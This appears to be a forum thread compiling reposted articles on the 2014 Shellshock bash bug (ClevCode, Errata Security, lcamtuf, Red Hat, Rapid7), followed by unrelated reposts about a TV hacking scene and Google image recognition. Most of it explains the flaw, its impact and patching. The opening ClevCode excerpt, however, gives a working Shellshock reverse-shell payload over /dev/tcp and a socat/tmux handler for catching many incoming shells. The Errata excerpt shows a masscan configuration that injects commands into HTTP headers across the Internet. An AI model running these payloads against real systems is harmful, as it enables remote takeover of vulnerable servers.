() { :; }; bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/ADDR/PORT >&0 2>&0'

To try this out, just run this in one shell to start a listener:

stty -echo raw; nc -l 12345; stty sane

Then do this in another shell:

bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/127.0.0.1/12345 >&0 2>&0'

To deal with all the shells coming your way I would suggest some tmux+socat magic I came up with when dealing with similar “problems” in the past. 
Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700):

#!/bin/sh
tmux has-session -t alltheshells 2>/dev/null \
    || tmux new-session -d -s alltheshells "cat>/dev/null" \; rename-window info
tmux send-keys -t alltheshells:info "$(date '+%Y-%m-%d %H:%M:%S') Received a shell from $SOCAT_PEERADDR" Enter
mkdir /tmp/alltheshells 2>/dev/null
tmux new-window -d -t alltheshells -n "$SOCAT_PEERADDR" \
    "sleep 1; stty -echo raw; socat unix-client:/tmp/alltheshells/$$.sock -; stty sane; echo; echo EOF; read"
socat unix-listen:/tmp/alltheshells/$$.sock -

Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen to):

socat tcp-l:PORT,reuseaddr,fork exec:./alltheshells-handler

When the shells start popping you can do:

tmux attach -t alltheshells

The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going. If you want to try this with my personal spiced-up tmux configuration, it is available for download on Pastebin.

Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta-key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with.

Sursa: CVE-2014-6271 / Shellshock & How to handle all the shells! | ClevCode
18. [h=3]Bash 'shellshock' scan of the Internet[/h]

By Robert Graham

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72. The configuration file for masscan looks something like:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some early results show that this bug is widespread:

A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.

Sursa: Errata Security: Bash 'shellshock' scan of the Internet
19. We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day.

Let's start with the nature of the bug. At its core, the problem is caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables. The functionality in action looks like this:

$ function foo { echo "hi mom"; }
$ export -f foo
$ bash -c 'foo' # Spawn nested shell, call 'foo'
hi mom

The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable starting with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here:

$ foo='() { echo "hi mom"; }' bash -c 'foo'
hi mom

The concept of giving magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will probably be initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn.

And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet. 
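The header-to-environment hand-off described above can be simulated locally, without a web server. This is a sketch of my own (the header value is hypothetical, and it assumes bash is installed); it mimics what Apache does when it exports a raw request header before starting a CGI handler.

```shell
# Pretend to be the web server: place the raw header value into the child's
# environment, then start bash the way a CGI handler would be started.
# On a vulnerable bash, "echo injected" fires during startup, before the
# intended command; on a patched bash only the intended output appears.
HTTP_USER_AGENT='() { :; }; echo injected' \
    bash -c 'echo "handling request"'
```

Nothing in the child command references $HTTP_USER_AGENT at all; it is the act of importing the environment at startup that triggers the parsing path.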
With that out of the way, it is important to note that today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function def. But even with all the current patches applied, you can still do this:

Cookie: () { echo "Hello world"; }

...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will always be prefixed with HTTP_*, so it's unlikely to clash with anything or be called by accident - but intuitively, it's a pretty scary outcome.

In the same vein, doing this will also have an unexpected result:

Cookie: () { oops

If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log.

All in all, the fix hinges on two risky assumptions:

That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that hasn't been studied in much detail until now.

That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has already been proved wrong by Tavis; the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern.

If I were a betting man, I would not bet on the fix holding up in the long haul. A more reasonable solution would involve temporarily disabling function exports or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment.

What else? 
Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash!

This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter.

For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with.

Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems of all sorts.

PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on. 
Sursa: lcamtuf's blog: Quick notes about the bash bug, its impact, and the fixes so far
20. Bash specially-crafted environment variables code injection attack

Posted on 2014/09/24 by Huzaifa Sidhpurwala

Bash, or the Bourne again shell, is a UNIX-like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal-based command interpreter to many other fancy uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run the bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc.) or even provide limited command execution support (git, etc.).

Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:

ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

Apache servers using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string). PHP scripts executed with mod_php are not affected even if they spawn subshells. 
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

Any other application which is hooked onto a shell or runs a shell script using bash as the interpreter is also exposed. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way described above, but doing so should be considered a bad programming practice.

Red Hat has issued security advisories that fix this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fix this issue. 
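The point about unexported variables can be checked directly. A small sketch of my own: the same crafted value, assigned but never exported, never reaches the child shell at all.

```shell
# An unexported shell variable is not part of the child process environment,
# so the crafted value is never seen by the child bash's startup parser,
# vulnerable version or not.
x='() { :;}; echo vulnerable'   # assigned, but NOT exported
bash -c 'echo this is a test'   # child never sees x
```

Only `export x` (or prefixing the command with `env x=...`, as in the example above) moves the value into the environment and exposes the function-import parsing path.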
We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723. Information on CentOS can be found at [CentOS] Critical update for bash released today.

Sursa: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
21. Bash-ing Into Your Network – Investigating CVE-2014-6271

Posted by Jen Ellis in Information Security on Sep 25, 2014 3:34:35 AM

By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It’s rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

Should I panic?

The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack.

The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process.

What is vulnerable?

This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. 
So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash.

Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise). There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue.

Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices, are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. 
Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.

The two most likely situations where this vulnerability will be exploited in the wild:

Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shell

PHP applications running in CGI mode that call out to system() and where Bash is the default shell

Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to exploit it are fairly uncommon for remote exploitation.

Is it as bad as Heartbleed?

There has been a great deal of debate on this in the community, and we’re not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks.

BUT – and that’s a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact was way more widespread. 
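A minimal illustration of the first scenario, the diagnostic CGI script: this is a hypothetical example of my own, not taken from the post, with an invented path and server name.

```shell
#!/bin/bash
# cgi-bin/diag.sh (hypothetical). Nothing in this script looks dangerous,
# but the web server has already exported request headers (HTTP_USER_AGENT,
# HTTP_COOKIE, ...) into the environment before bash starts; a vulnerable
# bash executes trailing code from a crafted header while importing the
# environment, before this first echo ever runs.
echo "Content-Type: text/plain"
echo
echo "Diagnostics for ${SERVER_NAME:-localhost}"
date
```

The second scenario works the same way one hop removed: a PHP script running under CGI calls system(), which spawns /bin/sh with the same attacker-influenced environment.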
How can you protect yourself?

The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though the fix for CVE-2014-6271 is not complete, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example systems that are End-of-Life), it’s critical that they are protected behind a firewall. A big one. And test whether that firewall is secure.

What can we do to help?

Rapid7's Nexpose and Metasploit products have been updated to assist with the detection and verification of these issues. Nexpose has been updated to check for CVE-2014-6271 via credentialed scans and will be updated again soon to cover the new packages released for CVE-2014-7169. Metasploit added a module to the framework a few hours ago and it will become available in both Metasploit Community and Metasploit Pro in our weekly update. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. If you would like some advice on how to handle this situation, our Services team can help.

Are Rapid7’s solutions affected?

Based on our current investigation, we are confident that our solutions are not impacted by this vulnerability in any way that could affect our customers and users. If we become aware of any further possibilities for exploitation, we’ll update this blog to keep you informed.

Sursa: https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
22. [h=1]Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever[/h]

So Scorpion debuted last night on CBS, bringing us the thrilling tale of "geniuses" who help DHS by setting up wifi access points in restaurants. Yes, that is a true plot point. It all leads to this scene, whose true meaning I will unfold for you so that you can appreciate the full amazing awfulness.

https://www.youtube.com/watch?v=igxrvISaY4E

All you need to know about the main character is that he's a genius who is "on software," which means he tells people things like "open your email and click the link." He has trouble communicating his emotions because he's a geek who only understands machines, and he has a dusty warehouse space that's shared by a tough hardware expert, a hat-wearing psychology master, and a nerdy "human calculator."

This week, the DHS brings him an emergency! There is a bug in the local airport's software and now 200 planes are going to crash if he doesn't do something! So he decides that the best thing to do is reboot from a backup version (yes that is the ACTUAL SUPER ELITE HIGH TECH THING HE'S DOING). But where is the backup? Ohhhh, it turns out EVERY PLANE has it, and if only they could download it from one of the planes, everybody could land and nobody would crash. The only way to get that backup, though, is USING AN ETHERNET CABLE DANGLED OUT OF THE BOTTOM OF THE PLANE AND PLUGGED INTO HIS LAPTOP.

Oh I know, I know — you think that's ridiculous, right? But it's not! Because they ALREADY TRIED A WIFI CONNECTION and it didn't work. So obviously the next thing is the ethernet cable. Also, the best way to do all this is to fly the plane low over the car that is racing ON THE LANDING STRIP. 
No, don't LAND THE DAMN PLANE on said strip and then reboot from the plane's backup (note that I am not even getting into the sheer dumbfoundery of the notion that the planes all have a backup of the software, or that the entire airport is run on "a piece of software," or that you can't land without software EVEN THOUGH WE ACTUALLY INVENTED PLANES BEFORE WE INVENTED COMPUTERS).

Oh and also? At one point, we see that all the computers are running VMware. Which — did VMware pay for product placement? Did Scorpion hire somebody with a job title like "cybersecurity ninja" from VMware to advise them? We may never know.

So anyway the guy gets some random chick from the diner where he installed some wifi to drive with him in his car and hook up the ethernet cable and save the airport. Yay! Airport rebooted! Hacker triumph! Next week, the geniuses will help a guy whose pants keep falling down.

I apologize for all the caps but I had a lot of feels.

Sursa: Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever
23. Google's latest object recognition tech can spot everything in your living room

by Jon Fingas | @jonfingas | September 8th 2014 at 4:38 am

Automatic object recognition in images is currently tricky. Even if a computer has the help of smart algorithms and human assistants, it may not catch everything in a given scene. Google might change that soon, though; it just detailed a new detection system that can easily spot lots of objects in a scene, even if they're partly obscured. The key is a neural network that can rapidly refine the criteria it's looking for without requiring a lot of extra computing power. The result is a far deeper scanning system that can both identify more objects and make better guesses -- it can spot tons of items in a living room, including (according to Google's odd example) a flying cat. The technology is still young, but the internet giant sees its recognition breakthrough helping everything from image searches through to self-driving cars. Don't be surprised if it gets much easier to look for things online using only the vaguest of terms.

Sursa: Google's latest object recognition tech can spot everything in your living room
24. It increases the post count and adds fresh content for Google, i.e. SEO. That way, when people search Google for "salut", they will land on RST and learn how to greet each other.
25. A quick fix is already available: apt-get update/yum update, or whatever else you prefer.
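Concretely, on the common distributions the upgrade plus a sanity check looks something like this (a sketch, assuming the stock `bash` package name and root privileges; the `|| true` just lets the snippet fall through on whichever distro lacks that package manager):

```shell
# Debian/Ubuntu: refresh package lists, then upgrade only bash
apt-get update && apt-get install --only-upgrade -y bash || true

# RHEL/CentOS/Fedora: upgrade bash via yum
yum update -y bash || true

# Sanity check: a patched bash prints only "ok", with no extra "vulnerable" line
env x='() { :;}; echo vulnerable' bash -c 'echo ok'
```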